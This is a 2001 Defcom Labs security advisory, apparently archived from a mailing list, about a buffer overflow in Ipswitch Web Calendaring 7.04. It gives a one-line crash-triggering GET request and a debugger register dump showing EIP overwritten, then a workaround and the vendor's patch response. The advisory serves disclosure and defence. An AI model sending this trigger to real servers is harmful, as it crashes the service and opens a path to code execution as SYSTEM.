======================================================================
Defcom Labs Advisory def-2001-29
Ipswitch Web Calendaring 7.04 Buffer Overflow
Author: Andreas Junestam <andreasat_private>
Release Date: 2001-10-12
======================================================================
------------------------=[Brief Description]=-------------------------
When sending a request to the Web Calender (port 8484) longer than 97
bytes, a overflow will occur and EIP will be overwritten.
------------------------=[Affected Systems]=--------------------------
- Ipswitch Web Calendaring 7.04 and possibly earlier versions
----------------------=[Detailed Description]=------------------------
Sending a request like:
GET /'A' x 96 HTTP/1.0
Generates:
Access violation - code c0000005 (first chance)
eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e
edi=00000000 eip=61616161 esp=016f99fc ebp=61616161
61616161 ?? ???
This leaves us with the possibility to run code as SYSTEM. Mind though,
the server does a ToLower on the buffer BEFORE the overflow occours,
limiting the number of instructions we can use.
---------------------------=[Workaround]=-----------------------------
Download the new version from:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 1st of
October, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
http://labs.defcom.com http://www.defcom.com
======================================================================
This archive was generated by hypermail 2b30 : Fri Oct 12 2001 - 08:14:34 PDT